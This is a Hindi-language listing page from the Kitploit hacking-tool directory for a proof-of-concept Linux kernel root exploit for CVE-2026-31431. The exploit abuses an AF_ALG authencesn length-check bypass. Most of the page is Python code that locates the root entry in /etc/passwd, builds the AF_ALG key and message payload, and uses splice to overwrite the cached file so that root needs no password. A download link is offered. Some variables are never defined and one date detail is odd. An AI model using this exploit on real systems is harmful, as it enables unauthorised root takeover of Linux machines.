Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2026-31431-poc — CVE-2026-31431 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो AF_ALG authenc लंबाई जांच बाईपास के माध्यम से Linux कर्नेल विशेषाधिकार वृद्धि है, जो /etc/passwd को संशोधित करके रूट प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/yuspring/cve-2026-31431-poc
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणबाइनरी शोषण
GitHubyuspring/cve-2026-31431-poc

cve-2026-31431-poc

CVE-2026-31431 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो AF_ALG authenc लंबाई जांच बाईपास के माध्यम से Linux कर्नेल विशेषाधिकार वृद्धि है, जो /etc/passwd को संशोधित करके रूट प्राप्त करता है।

रिपॉजिटरी देखें
333 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE 2026-31431 POC

यह एक्सप्लॉइट Linux में authencesn लंबाई जांच सुविधा की त्रुटि का फायदा उठाता है, जिससे dirty page को उन स्थानों पर write back किया जाता है जहां उपयोगकर्ता के पास अनुमति नहीं होती, जिससे विशेषाधिकार वृद्धि (privilege escalation) होती है

मुख्य रूप से इस repo के हमले के सिद्धांत का संदर्भ लिया गया है, कुछ payload में संशोधन किया गया है
https://github.com/rootsecdev/cve_2026_31431

image यह छवि 6.12.85 linux kernel का सुधार पैच है, भविष्य में इन पैचों का trace code करें

कार्यान्वयन प्रक्रिया

  1. RAM में /etc/passwd खोलें और संशोधित करें
root@kitploit:~
# Get /etc/passwd file info
with open("/etc/passwd", "rb") as f:  # binary open
  content = f.read()
  idx = content.find(b"root:x")  # find root:x location
  x_offset = idx + 5  # Get x location

लक्ष्य /etc/passwd में root का पासवर्ड बिना पासवर्ड के बदलना है (/etc/shadow सत्यापन के बिना)

root@kitploit:~
# Before: root:[x:0:]0:root:/root:/bin/bash
# After   root:[:0:0]0:root:/root:/bin/bash
exploit_data = b":0:0"
  1. socket कनेक्ट करें और payload बनाएं
root@kitploit:~
sock = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)  # Connect socket AF_ALG using sequence packet
sock.bind(("aead", ALG_NAME))

# Build the key payload
# Structure: [rtattr header (8 bytes)] + [enc_key_len (4 bytes)] + [authkey] + [enckey]
authkey, enckey = b"\x00" * 32, b"\x00" * 16
rtattr = struct.pack("HH", 8, 1)
keyparam = struct.pack(">I", len(enckey))
key = rtattr + keyparam + authkey + enckey

# Set key and accept socket
sock.setsockopt(SOL_ALG, ALG_SET_KEY, key)
op, _ = sock.accept() # open socket

# Send payload
payload = b"\x00" * 4 + string
cmsg = [
  (SOL_ALG, ALG_SET_OP, struct.pack("I", 0)),  # Decrypt
  (SOL_ALG, ALG_SET_IV, struct.pack("I", 16) + b"\x00" * 16), # Set IV
  (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, struct.pack("I", 8)), # Set AAD length(8)
  ]
  op.sendmsg([payload], cmsg, socket.MSG_MORE)
  1. socket के माध्यम से payload भेजकर dirty page को फ़ाइल में write back कराएं
root@kitploit:~
# Splice connection
# Page Cache(exploit payload) -> socket(AF_ALG) -> Data(write back) -> pwn!!!
pr, pw = os.pipe()
os.splice(fd, pw, 32, offset_src=x_offset) # copy data from Page Cache to pipe
os.splice(pr, op.fileno(), 32)             # copy data from pipe to socket
try:
  op.recv(64)
except OSError:
  pass

Reference

https://xint.io/blog/copy-fail-linux-distributions

टूल डाउनलोड करें